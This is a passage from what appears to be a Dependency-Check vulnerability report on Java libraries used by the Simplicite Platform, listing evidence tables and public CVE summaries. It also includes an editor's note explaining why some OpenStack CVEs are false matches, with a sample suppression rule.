License: Oracle Free Use Terms and Conditions (FUTC): https://www.oracle.com/downloads/licenses/oracle-free-license.html
File Path: /var/simplicite/.m2/repository/com/oracle/database/jdbc/ojdbc8/23.3.0.23.09/ojdbc8-23.3.0.23.09.jar
MD5: c6f402fe18e14e384f76ede75f8dc211
SHA1: d36f44a0ed8a07dcff2afef7f12ccdbd460d053d
SHA256: 58d793f5bd0c5b074d8a9d2fd7695a36c7d5c7621bc01d2caeeb4422180ae816
Referenced In Project/Scope: Simplicite Platform:runtime
Evidence Type Source Name Value Confidence Vendor file name ojdbc8 High Vendor jar package name driver Highest Vendor jar package name jdbc Highest Vendor jar package name oracle Highest Vendor jar (hint) package name sun Highest Vendor Manifest automatic-module-name com.oracle.database.jdbc Medium Vendor Manifest Implementation-Vendor Oracle Corporation High Vendor Manifest repository-id JAVAVM_MAIN_LINUX.X64_230807.6 Low Vendor Manifest specification-vendor Sun Microsystems Inc. Low Vendor pom artifactid ojdbc8 Highest Vendor pom artifactid ojdbc8 Low Vendor pom developer org Oracle America, Inc. Medium Vendor pom developer org URL http://www.oracle.com Medium Vendor pom groupid com.oracle.database.jdbc Highest Vendor pom name ojdbc8 High Vendor pom url https://www.oracle.com/database/technologies/maven-central-guide.html Highest Product file name ojdbc8 High Product jar package name driver Highest Product jar package name jdbc Highest Product jar package name oracle Highest Product Manifest automatic-module-name com.oracle.database.jdbc Medium Product Manifest Implementation-Title JDBC High Product Manifest repository-id JAVAVM_MAIN_LINUX.X64_230807.6 Low Product Manifest specification-title JDBC Medium Product pom artifactid ojdbc8 Highest Product pom developer org Oracle America, Inc. Low Product pom developer org URL http://www.oracle.com Low Product pom groupid com.oracle.database.jdbc Highest Product pom name ojdbc8 High Product pom url https://www.oracle.com/database/technologies/maven-central-guide.html Medium Version file version 23.3.0.23.09 High Version Manifest Implementation-Version 23.3.0.23.09 High Version pom version 23.3.0.23.09 Highest
opencensus-api-0.24.0.jar
Description: null
License: The Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/io/opencensus/opencensus-api/0.24.0/opencensus-api-0.24.0.jar
MD5: 57e26d9c2d3947a0b3716ec8bb32c9bf
SHA1: f974451b19007ce820f433311ce8adb88e2b7d2c
SHA256: f561b1cc2673844288e596ddf5bb6596868a8472fd2cb8993953fc5c034b2352
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name opencensus-api High Vendor jar package name io Highest Vendor jar package name opencensus Highest Vendor Manifest source-compatibility 1.7 Low Vendor Manifest target-compatibility 1.7 Low Vendor pom artifactid opencensus-api Highest Vendor pom artifactid opencensus-api Low Vendor pom developer email census-developers@googlegroups.com Low Vendor pom developer id io.opencensus Medium Vendor pom developer name OpenCensus Contributors Medium Vendor pom developer org OpenCensus Authors Medium Vendor pom developer org URL https://www.opencensus.io Medium Vendor pom groupid io.opencensus Highest Vendor pom name OpenCensus High Vendor pom url census-instrumentation/opencensus-java Highest Product file name opencensus-api High Product jar package name io Highest Product jar package name opencensus Highest Product Manifest Implementation-Title opencensus-api High Product Manifest source-compatibility 1.7 Low Product Manifest target-compatibility 1.7 Low Product pom artifactid opencensus-api Highest Product pom developer email census-developers@googlegroups.com Low Product pom developer id io.opencensus Low Product pom developer name OpenCensus Contributors Low Product pom developer org OpenCensus Authors Low Product pom developer org URL https://www.opencensus.io Low Product pom groupid io.opencensus Highest Product pom name OpenCensus High Product pom url census-instrumentation/opencensus-java High Version file version 0.24.0 High Version Manifest Implementation-Version 0.24.0 High Version pom version 0.24.0 Highest
opencensus-contrib-grpc-metrics-0.21.0.jar
Description: null
License: The Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/io/opencensus/opencensus-contrib-grpc-metrics/0.21.0/opencensus-contrib-grpc-metrics-0.21.0.jar
MD5: dbbefdc1c3e6bee5e578812d961ca6ba
SHA1: f07d3a325f1fe69ee40d6b409086964edfef4e69
SHA256: 29fc79401082301542cab89d7054d2f0825f184492654c950020553ef4ff0ef8
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name opencensus-contrib-grpc-metrics High Vendor jar package name contrib Highest Vendor jar package name grpc Highest Vendor jar package name io Highest Vendor jar package name opencensus Highest Vendor Manifest source-compatibility 1.7 Low Vendor Manifest target-compatibility 1.7 Low Vendor pom artifactid opencensus-contrib-grpc-metrics Highest Vendor pom artifactid opencensus-contrib-grpc-metrics Low Vendor pom developer email census-developers@googlegroups.com Low Vendor pom developer id io.opencensus Medium Vendor pom developer name OpenCensus Contributors Medium Vendor pom developer org OpenCensus Authors Medium Vendor pom developer org URL https://www.opencensus.io Medium Vendor pom groupid io.opencensus Highest Vendor pom name OpenCensus High Vendor pom url census-instrumentation/opencensus-java Highest Product file name opencensus-contrib-grpc-metrics High Product jar package name contrib Highest Product jar package name grpc Highest Product jar package name io Highest Product jar package name opencensus Highest Product Manifest Implementation-Title opencensus-contrib-grpc-metrics High Product Manifest source-compatibility 1.7 Low Product Manifest target-compatibility 1.7 Low Product pom artifactid opencensus-contrib-grpc-metrics Highest Product pom developer email census-developers@googlegroups.com Low Product pom developer id io.opencensus Low Product pom developer name OpenCensus Contributors Low Product pom developer org OpenCensus Authors Low Product pom developer org URL https://www.opencensus.io Low Product pom groupid io.opencensus Highest Product pom name OpenCensus High Product pom url census-instrumentation/opencensus-java High Version file version 0.21.0 High Version Manifest Implementation-Version 0.21.0 High Version pom version 0.21.0 Highest
opencensus-contrib-grpc-util-0.21.0.jar
Description: null
License: The Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/io/opencensus/opencensus-contrib-grpc-util/0.21.0/opencensus-contrib-grpc-util-0.21.0.jar
MD5: c8d17aa0a8707b0244c324ac8722094f
SHA1: 758d60f34833809df6563e7532e852f61f14b898
SHA256: ad44bf7df586d2e8eb1dad5849cd8b50429ed20fe80da76129006318a4a30ef1
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name opencensus-contrib-grpc-util High Vendor jar package name contrib Highest Vendor jar package name grpc Highest Vendor jar package name io Highest Vendor jar package name opencensus Highest Vendor Manifest source-compatibility 1.7 Low Vendor Manifest target-compatibility 1.7 Low Vendor pom artifactid opencensus-contrib-grpc-util Highest Vendor pom artifactid opencensus-contrib-grpc-util Low Vendor pom developer email census-developers@googlegroups.com Low Vendor pom developer id io.opencensus Medium Vendor pom developer name OpenCensus Contributors Medium Vendor pom developer org OpenCensus Authors Medium Vendor pom developer org URL https://www.opencensus.io Medium Vendor pom groupid io.opencensus Highest Vendor pom name OpenCensus High Vendor pom url census-instrumentation/opencensus-java Highest Product file name opencensus-contrib-grpc-util High Product jar package name contrib Highest Product jar package name grpc Highest Product jar package name io Highest Product jar package name opencensus Highest Product Manifest Implementation-Title opencensus-contrib-grpc-util High Product Manifest source-compatibility 1.7 Low Product Manifest target-compatibility 1.7 Low Product pom artifactid opencensus-contrib-grpc-util Highest Product pom developer email census-developers@googlegroups.com Low Product pom developer id io.opencensus Low Product pom developer name OpenCensus Contributors Low Product pom developer org OpenCensus Authors Low Product pom developer org URL https://www.opencensus.io Low Product pom groupid io.opencensus Highest Product pom name OpenCensus High Product pom url census-instrumentation/opencensus-java High Version file version 0.21.0 High Version Manifest Implementation-Version 0.21.0 High Version pom version 0.21.0 Highest
opencensus-contrib-http-util-0.24.0.jar
Description: null
License: The Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/io/opencensus/opencensus-contrib-http-util/0.24.0/opencensus-contrib-http-util-0.24.0.jar
MD5: 12d9df25feb2c6ff817465103dd3e13f
SHA1: 006d96406c272d884038eb63b262458df75b5445
SHA256: 7155273bbb1ed3d477ea33cf19d7bbc0b285ff395f43b29ae576722cf247000f
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name opencensus-contrib-http-util High Vendor jar package name contrib Highest Vendor jar package name http Highest Vendor jar package name io Highest Vendor jar package name opencensus Highest Vendor Manifest source-compatibility 1.7 Low Vendor Manifest target-compatibility 1.7 Low Vendor pom artifactid opencensus-contrib-http-util Highest Vendor pom artifactid opencensus-contrib-http-util Low Vendor pom developer email census-developers@googlegroups.com Low Vendor pom developer id io.opencensus Medium Vendor pom developer name OpenCensus Contributors Medium Vendor pom developer org OpenCensus Authors Medium Vendor pom developer org URL https://www.opencensus.io Medium Vendor pom groupid io.opencensus Highest Vendor pom name OpenCensus High Vendor pom url census-instrumentation/opencensus-java Highest Product file name opencensus-contrib-http-util High Product jar package name contrib Highest Product jar package name http Highest Product jar package name io Highest Product jar package name opencensus Highest Product Manifest Implementation-Title opencensus-contrib-http-util High Product Manifest source-compatibility 1.7 Low Product Manifest target-compatibility 1.7 Low Product pom artifactid opencensus-contrib-http-util Highest Product pom developer email census-developers@googlegroups.com Low Product pom developer id io.opencensus Low Product pom developer name OpenCensus Contributors Low Product pom developer org OpenCensus Authors Low Product pom developer org URL https://www.opencensus.io Low Product pom groupid io.opencensus Highest Product pom name OpenCensus High Product pom url census-instrumentation/opencensus-java High Version file version 0.24.0 High Version Manifest Implementation-Version 0.24.0 High Version pom version 0.24.0 Highest
openjson-1.0.11.jar
Description: A clean-room Apache-licensed implementation of simple JSON processing
License: The Apache Software License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/com/github/openjson/openjson/1.0.11/openjson-1.0.11.jar
MD5: adea05d96e2b300d8d93d87877bbfc0c
SHA1: 89d80fba6ebca174f23614cdfd6e50331c676d26
SHA256: 6086e8c4219281e42c4ccb3dbf207995bd10787d27b01aaf00ac1f9b0dd34c9f
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name openjson High Vendor jar package name github Highest Vendor jar package name json Highest Vendor jar package name openjson Highest Vendor Manifest automatic-module-name com.github.openjson Medium Vendor Manifest build-jdk-spec 11 Low Vendor Manifest bundle-docurl https://github.com/openjson/openjson Low Vendor Manifest bundle-symbolicname com.github.openjson Medium Vendor Manifest originally-created-by Apache Maven Bundle Plugin Low Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" Low Vendor pom artifactid openjson Highest Vendor pom artifactid openjson Low Vendor pom developer id openjson Medium Vendor pom developer name openjson team Medium Vendor pom groupid com.github.openjson Highest Vendor pom name Open JSON High Vendor pom url openjson/openjson Highest Product file name openjson High Product jar package name github Highest Product jar package name json Highest Product jar package name openjson Highest Product Manifest automatic-module-name com.github.openjson Medium Product Manifest build-jdk-spec 11 Low Product Manifest bundle-docurl https://github.com/openjson/openjson Low Product Manifest Bundle-Name Open JSON Medium Product Manifest bundle-symbolicname com.github.openjson Medium Product Manifest originally-created-by Apache Maven Bundle Plugin Low Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.6))" Low Product pom artifactid openjson Highest Product pom developer id openjson Low Product pom developer name openjson team Low Product pom groupid com.github.openjson Highest Product pom name Open JSON High Product pom url openjson/openjson High Version file version 1.0.11 High Version Manifest Bundle-Version 1.0.11 High Version pom version 1.0.11 Highest
CVE-2022-45688
A stack overflow in the XML.toJSONObject component of hutool-json v5.8.10 allows attackers to cause a Denial of Service (DoS) via crafted JSON or XML data.
CWE-787 Out-of-bounds Write
CVSSv3: Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
References:
Vulnerable Software & Versions:
CVE-2023-5072
Denial of Service in JSON-Java versions up to and including 20230618. A bug in the parser means that an input string of modest size can lead to indefinite amounts of memory being used.
CWE-770 Allocation of Resources Without Limits or Throttling
CVSSv3: Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
References:
Vulnerable Software & Versions:
opennlp-tools-1.9.1.jar
Description: The Apache Software Foundation provides support for the Apache community of open-source software projects. The Apache projects are characterized by a collaborative, consensus based development process, an open and pragmatic software license, and a desire to create high quality software that leads the way in its field. We consider ourselves not simply a group of projects sharing a server, but rather a community of developers and users.
License: https://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/org/apache/opennlp/opennlp-tools/1.9.1/opennlp-tools-1.9.1.jar
MD5: d7c38308f18fcbba1bd87d0d8991ed82
SHA1: 8145429d82a4b811fdd3390557dbe6546b0153ad
SHA256: 79711328756f4c8a909d7ae36d62bf2f949cca685d98bfd46b052e24b15df7e2
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name opennlp-tools High Vendor jar package name opennlp Highest Vendor jar package name tools Highest Vendor Manifest automatic-module-name org.apache.opennlp.tools Medium Vendor Manifest bundle-docurl https://www.apache.org/ Low Vendor Manifest bundle-requiredexecutionenvironment JavaSE-1.8 Low Vendor Manifest bundle-symbolicname org.apache.opennlp.tools Medium Vendor Manifest Implementation-Vendor The Apache Software Foundation High Vendor Manifest Implementation-Vendor-Id org.apache.opennlp Medium Vendor Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.8))" Low Vendor Manifest specification-vendor The Apache Software Foundation Low Vendor pom artifactid opennlp-tools Highest Vendor pom artifactid opennlp-tools Low Vendor pom groupid org.apache.opennlp Highest Vendor pom name Apache OpenNLP Tools High Vendor pom parent-artifactid opennlp Low Product file name opennlp-tools High Product jar package name opennlp Highest Product jar package name tools Highest Product jar package name version Highest Product Manifest automatic-module-name org.apache.opennlp.tools Medium Product Manifest bundle-docurl https://www.apache.org/ Low Product Manifest Bundle-Name Apache OpenNLP Tools Medium Product Manifest bundle-requiredexecutionenvironment JavaSE-1.8 Low Product Manifest bundle-symbolicname org.apache.opennlp.tools Medium Product Manifest Implementation-Title Apache OpenNLP Tools High Product Manifest require-capability osgi.ee;filter:="(&(osgi.ee=JavaSE)(version=1.8))" Low Product Manifest specification-title Apache OpenNLP Tools Medium Product pom artifactid opennlp-tools Highest Product pom groupid org.apache.opennlp Highest Product pom name Apache OpenNLP Tools High Product pom parent-artifactid opennlp Medium Version file version 1.9.1 High Version Manifest Bundle-Version 1.9.1 High Version Manifest Implementation-Version 1.9.1 High Version pom version 1.9.1 Highest
openstack-keystone-2.2.0.jar
Description: jclouds components to access an implementation of OpenStack Keystone
License: https://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/org/apache/jclouds/api/openstack-keystone/2.2.0/openstack-keystone-2.2.0.jar
MD5: ba713f3c51fee7ad71e8ab3578935b7a
SHA1: 27151bb37c58c3eb45a519b829148435798dc2ca
SHA256: 299711877eda635713a7a946a29bacfdaeeeb19f965d54fd8b5491261d5a0596
Referenced In Project/Scope: Simplicite Platform:compile
Evidence Type Source Name Value Confidence Vendor file name openstack-keystone High Vendor jar package name jclouds Highest Vendor jar package name keystone Highest Vendor jar package name openstack Highest Vendor Manifest bundle-docurl http://www.apache.org/ Low Vendor Manifest bundle-symbolicname openstack-keystone Medium Vendor Manifest Implementation-Vendor jclouds High Vendor Manifest Implementation-Vendor-Id org.jclouds Medium Vendor Manifest specification-vendor jclouds Low Vendor pom artifactid openstack-keystone Highest Vendor pom artifactid openstack-keystone Low Vendor pom groupid org.apache.jclouds.api Highest Vendor pom name jclouds openstack-keystone api High Vendor pom parent-artifactid jclouds-project Low Vendor pom parent-groupid org.apache.jclouds Medium Product file name openstack-keystone High Product jar package name jclouds Highest Product jar package name keystone Highest Product jar package name openstack Highest Product Manifest bundle-docurl http://www.apache.org/ Low Product Manifest Bundle-Name jclouds openstack-keystone api Medium Product Manifest bundle-symbolicname openstack-keystone Medium Product Manifest Implementation-Title jclouds openstack-keystone api High Product Manifest specification-title jclouds jclouds openstack-keystone api Medium Product pom artifactid openstack-keystone Highest Product pom groupid org.apache.jclouds.api Highest Product pom name jclouds openstack-keystone api High Product pom parent-artifactid jclouds-project Medium Product pom parent-groupid org.apache.jclouds Medium Version file version 2.2.0 High Version Manifest Bundle-Version 2.2.0 High Version Manifest Implementation-Version 2.2.0 High Version pom version 2.2.0 Highest
CVE-2020-12689
An issue was discovered in OpenStack Keystone before 15.0.1, and 16.0.0. Any user authenticated within a limited scope (trust/oauth/application credential) can create an EC2 credential with an escalated permission, such as obtaining admin while the user is on a limited viewer role. This potentially allows a malicious user to act as the admin on a project another user has the admin role on, which can effectively grant that user global admin privileges.
CWE-269 Improper Privilege Management
CVSSv2: Base Score: MEDIUM (6.5) Vector: /AV:N/AC:L/Au:S/C:P/I:P/A:P
CVSSv3: Base Score: HIGH (8.8) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
References:
Vulnerable Software & Versions:
CVE-2020-12690
An issue was discovered in OpenStack Keystone before 15.0.1, and 16.0.0. The list of roles provided for an OAuth1 access token is silently ignored. Thus, when an access token is used to request a keystone token, the keystone token contains every role assignment the creator had for the project. This results in the provided keystone token having more role assignments than the creator intended, possibly giving unintended escalated access.
CWE-613 Insufficient Session Expiration
CVSSv2: Base Score: MEDIUM (6.5) Vector: /AV:N/AC:L/Au:S/C:P/I:P/A:P
CVSSv3: Base Score: HIGH (8.8) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
References:
Vulnerable Software & Versions:
CVE-2020-12691
An issue was discovered in OpenStack Keystone before 15.0.1, and 16.0.0. Any authenticated user can create an EC2 credential for themselves for a project that they have a specified role on, and then perform an update to the credential user and project, allowing them to masquerade as another user. This potentially allows a malicious user to act as the admin on a project another user has the admin role on, which can effectively grant that user global admin privileges.
CWE-863 Incorrect Authorization
CVSSv2: Base Score: MEDIUM (6.5) Vector: /AV:N/AC:L/Au:S/C:P/I:P/A:P
CVSSv3: Base Score: HIGH (8.8) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
References:
Vulnerable Software & Versions:
CVE-2021-3563
A flaw was found in openstack-keystone. Only the first 72 characters of an application secret are verified, allowing attackers to bypass some password complexity which administrators may be counting on. The highest threat from this vulnerability is to data confidentiality and integrity.
CWE-863 Incorrect Authorization
CVSSv3: Base Score: HIGH (7.4) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
References:
Vulnerable Software & Versions:
CVE-2020-12692
An issue was discovered in OpenStack Keystone before 15.0.1, and 16.0.0. The EC2 API doesn't have a signature TTL check for AWS Signature V4. An attacker can sniff the Authorization header, and then use it to reissue an OpenStack token an unlimited number of times.
CWE-347 Improper Verification of Cryptographic Signature, CWE-294 Authentication Bypass by Capture-replay
CVSSv2: Base Score: MEDIUM (5.5) Vector: /AV:N/AC:L/Au:S/C:P/I:P/A:N
CVSSv3: Base Score: MEDIUM (5.4) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N
References:
Vulnerable Software & Versions:
CVE-2018-14432 suppress
In the Federation component of OpenStack Keystone before 11.0.4, 12.0.0, and 13.0.0, an authenticated "GET /v3/OS-FEDERATION/projects" request may bypass intended access restrictions on listing projects. An authenticated user may discover projects they have no authority to access, leaking all projects in the deployment and their attributes. Only Keystone with the /v3/OS-FEDERATION endpoint enabled via policy.json is affected. CWE-200 Information Exposure
CVSSv2:
Base Score: LOW (3.5) Vector: /AV:N/AC:M/Au:S/C:P/I:N/A:N CVSSv3:
Base Score: MEDIUM (5.3) Vector: CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N References:
Vulnerable Software & Versions: (show all )
CVE-2018-20170 suppress
OpenStack Keystone through 14.0.1 has a user enumeration vulnerability because invalid usernames have much faster responses than valid ones for a POST /v3/auth/tokens request. NOTE: the vendor's position is that this is a hardening opportunity, and not necessarily an issue that should have an OpenStack Security Advisory.
CWE-200 Information Exposure
CVSSv2: MEDIUM (5.0), vector /AV:N/AC:L/Au:N/C:P/I:N/A:N
CVSSv3: MEDIUM (5.3), vector CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
openstack-swift-2.2.0.jar
Description: jclouds components to access an implementation of OpenStack Swift
License: https://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/org/apache/jclouds/api/openstack-swift/2.2.0/openstack-swift-2.2.0.jar
MD5: ca0768eb49f2856e5000e7fc424d3047
SHA1: bf907cbeec176840dbd0daeea90c4b4902f7fbc0
SHA256: aca9b128760baefd27418cbcef560e74038da5645b2421729e7354ed6adf7f00
Referenced In Project/Scope: Simplicite Platform:compile
Evidence:
Type | Source | Name | Value | Confidence
Vendor | file | name | openstack-swift | High
Vendor | jar | package name | jclouds | Highest
Vendor | jar | package name | openstack | Highest
Vendor | jar | package name | swift | Highest
Vendor | Manifest | bundle-docurl | http://www.apache.org/ | Low
Vendor | Manifest | bundle-symbolicname | openstack-swift | Medium
Vendor | Manifest | Implementation-Vendor | jclouds | High
Vendor | Manifest | Implementation-Vendor-Id | org.jclouds | Medium
Vendor | Manifest | specification-vendor | jclouds | Low
Vendor | pom | artifactid | openstack-swift | Highest
Vendor | pom | artifactid | openstack-swift | Low
Vendor | pom | groupid | org.apache.jclouds.api | Highest
Vendor | pom | name | jclouds openstack-swift api | High
Vendor | pom | parent-artifactid | jclouds-project | Low
Vendor | pom | parent-groupid | org.apache.jclouds | Medium
Product | file | name | openstack-swift | High
Product | jar | package name | jclouds | Highest
Product | jar | package name | openstack | Highest
Product | jar | package name | swift | Highest
Product | Manifest | bundle-docurl | http://www.apache.org/ | Low
Product | Manifest | Bundle-Name | jclouds openstack-swift api | Medium
Product | Manifest | bundle-symbolicname | openstack-swift | Medium
Product | Manifest | Implementation-Title | jclouds openstack-swift api | High
Product | Manifest | specification-title | jclouds jclouds openstack-swift api | Medium
Product | pom | artifactid | openstack-swift | Highest
Product | pom | groupid | org.apache.jclouds.api | Highest
Product | pom | name | jclouds openstack-swift api | High
Product | pom | parent-artifactid | jclouds-project | Medium
Product | pom | parent-groupid | org.apache.jclouds | Medium
Version | file | version | 2.2.0 | High
Version | Manifest | Bundle-Version | 2.2.0 | High
Version | Manifest | Implementation-Version | 2.2.0 | High
Version | pom | version | 2.2.0 | Highest
CVE-2017-16613
An issue was discovered in middleware.py in OpenStack Swauth through 1.2.0 when used with OpenStack Swift through 2.15.1. The Swift object store and proxy server are saving (unhashed) tokens retrieved from the Swauth middleware authentication mechanism to a log file as part of a GET URI. This allows attackers to bypass authentication by inserting a token into an X-Auth-Token header of a new request. NOTE: github.com/openstack/swauth URLs do not mean that Swauth is maintained by an official OpenStack project team.
CWE-287 Improper Authentication
CVSSv2: HIGH (7.5), vector /AV:N/AC:L/Au:N/C:P/I:P/A:P
CVSSv3: CRITICAL (9.8), vector CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE-2016-0737
OpenStack Object Storage (Swift) before 2.4.0 does not properly close client connections, which allows remote attackers to cause a denial of service (proxy-server resource consumption) via a series of interrupted requests to a Large Object URL.
CWE-399 Resource Management Errors
CVSSv2: MEDIUM (5.0), vector /AV:N/AC:L/Au:N/C:N/I:N/A:P
CVSSv3: HIGH (7.5), vector CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE-2016-0738
OpenStack Object Storage (Swift) before 2.3.1 (Kilo), 2.4.x, and 2.5.x before 2.5.1 (Liberty) do not properly close server connections, which allows remote attackers to cause a denial of service (proxy-server resource consumption) via a series of interrupted requests to a Large Object URL.
CWE-399 Resource Management Errors
CVSSv2: MEDIUM (5.0), vector /AV:N/AC:L/Au:N/C:N/I:N/A:P
CVSSv3: HIGH (7.5), vector CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE-2022-47950
An issue was discovered in OpenStack Swift before 2.28.1, 2.29.x before 2.29.2, and 2.30.0. By supplying crafted XML files, an authenticated user may coerce the S3 API into returning arbitrary file contents from the host server, resulting in unauthorized read access to potentially sensitive data. This impacts both s3api deployments (Rocky or later), and swift3 deployments (Queens and earlier, no longer actively developed).
CWE-552 Files or Directories Accessible to External Parties
CVSSv3: MEDIUM (6.5), vector CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

CVE-2015-1856
OpenStack Object Storage (Swift) before 2.3.0, when allow_version is configured, allows remote authenticated users to delete the latest version of an object by leveraging listing access to the x-versions-location container.
CWE-264 Permissions, Privileges, and Access Controls
CVSSv2: MEDIUM (5.5), vector /AV:N/AC:L/Au:S/C:N/I:P/A:P

CVE-2015-5223
OpenStack Object Storage (Swift) before 2.4.0 allows attackers to obtain sensitive information via a PUT tempurl and a DLO object manifest that references an object in another container.
CWE-200 Information Exposure
CVSSv2: MEDIUM (5.0), vector /AV:N/AC:L/Au:N/C:P/I:N/A:N

CVE-2017-8761
In OpenStack Swift through 2.10.1, 2.11.0 through 2.13.0, and 2.14.0, the proxy-server logs full tempurl paths, potentially leaking reusable tempurl signatures to anyone with read access to these logs. All Swift deployments using the tempurl middleware are affected.
CWE-200 Information Exposure
CVSSv2: MEDIUM (4.0), vector /AV:N/AC:L/Au:S/C:P/I:N/A:N
CVSSv3: MEDIUM (4.3), vector CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
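Editor's note and added example, not part of the generated report: every CVE listed for openstack-swift-2.2.0.jar describes the OpenStack Swift service itself (Python code such as middleware.py, the proxy-server, the tempurl and s3api/swift3 middleware), whereas this jar is the Apache jclouds Java client library used to talk to a Swift endpoint. Dependency-Check arrived at these entries through the product-name evidence above (jar package names "openstack" and "swift", pom name "jclouds openstack-swift api"), not through the presence of the affected code, so they are CPE-matching false positives and the right fix is a suppression rule rather than a library upgrade. The same check applies to the Keystone entries listed above, which describe the Keystone identity service rather than a Java client. The rule below is the shape the report's "suppress" link produces for a wrong CPE match, using the package URL format this report prints for related dependencies. The CPE value cpe:/a:openstack:swift is an assumption: the identifier actually matched sits in the collapsed "Vulnerable Software & Versions" list, and if more than one CPE appears there (for example a separate Swauth identifier for CVE-2017-16613), each needs its own cpe element.

```xml
<?xml version="1.0" encoding="UTF-8"?>
<suppressions xmlns="https://jeremylong.github.io/DependencyCheck/dependency-suppression.1.3.xsd">
  <!-- Added example, not generated by this report. The jclouds openstack-swift
       artifact is a Java client; the matched CPE belongs to the Swift server. -->
  <suppress>
    <notes><![CDATA[
    file name: openstack-swift-2.2.0.jar
    jclouds Java client for OpenStack Swift; the Swift server CPE is a false match.
    SHA1 as printed in the report: bf907cbeec176840dbd0daeea90c4b4902f7fbc0
    ]]></notes>
    <!-- Package URL in the form the report prints under Related Dependencies;
         the regex keeps the rule valid across future jclouds versions -->
    <packageUrl regex="true">^pkg:maven/org\.apache\.jclouds\.api/openstack\-swift@.*$</packageUrl>
    <!-- Assumed CPE; confirm it against the collapsed "show all" list before use -->
    <cpe>cpe:/a:openstack:swift</cpe>
  </suppress>
</suppressions>
```

Pass the file with --suppression on the command line, or via the suppressionFiles setting of the Maven or Gradle plugin; on the next run the "Vulnerabilities Suppressed" counter in the scan header accounts for these entries, and the notes block is the audit trail for why they were dismissed.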
org.apache.oltu.oauth2.client-1.0.2.jar
Description: Apache Oltu is an OAuth protocol implementation in Java.
License: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /var/simplicite/.m2/repository/org/apache/oltu/oauth2/org.apache.oltu.oauth2.client/1.0.2/org.apache.oltu.oauth2.client-1.0.2.jar
MD5: 433638a5fab67c3a8f111d58c1fec0a0
SHA1: b34e09d1cb84c4b63cedb65c5346ac44eecc22c5
SHA256: ebbe0095c829ecbbb29b5ab572277ff11b9e3969114e6f1bac5d23a8c97e7708
Referenced In Project/Scope: Simplicite Platform:compile
Evidence:
Type | Source | Name | Value | Confidence
Vendor | file | name | org.apache.oltu.oauth2.client | High
Vendor | jar | package name | apache | Highest
Vendor | jar | package name | client | Highest
Vendor | jar | package name | oauth2 | Highest
Vendor | jar | package name | oltu | Highest
Vendor | Manifest | bundle-docurl | https://oltu.apache.org/org.apache.oltu.oauth2.parent/org.apache.oltu.oauth2.client/ | Low
Vendor | Manifest | bundle-symbolicname | org.apache.oltu.oauth2.client | Medium
Vendor | Manifest | implementation-build | tags/org.apache.oltu.oauth2.parent-1.0.2/client@r1740515 | Low
Vendor | Manifest | implementation-build-date | 2016-04-22 13:07:39+0000 | Low
Vendor | pom | artifactid | apache.oltu.oauth2.client | Low
Vendor | pom | artifactid | org.apache.oltu.oauth2.client | Highest
Vendor | pom | groupid | org.apache.oltu.oauth2 | Highest
Vendor | pom | name | Apache Oltu - OAuth 2.0 - Client | High
Vendor | pom | parent-artifactid | org.apache.oltu.oauth2.parent | Low
Product | file | name | org.apache.oltu.oauth2.client | High
Product | jar | package name | apache | Highest
Product | jar | package name | client | Highest
Product | jar | package name | oauth2 | Highest
Product | jar | package name | oltu | Highest
Product | Manifest | bundle-docurl | https://oltu.apache.org/org.apache.oltu.oauth2.parent/org.apache.oltu.oauth2.client/ | Low
Product | Manifest | Bundle-Name | Apache Oltu - OAuth 2.0 - Client | Medium
Product | Manifest | bundle-symbolicname | org.apache.oltu.oauth2.client | Medium
Product | Manifest | implementation-build | tags/org.apache.oltu.oauth2.parent-1.0.2/client@r1740515 | Low
Product | Manifest | implementation-build-date | 2016-04-22 13:07:39+0000 | Low
Product | pom | artifactid | apache.oltu.oauth2.client | Highest
Product | pom | artifactid | org.apache.oltu.oauth2.client | Highest
Product | pom | groupid | org.apache.oltu.oauth2 | Highest
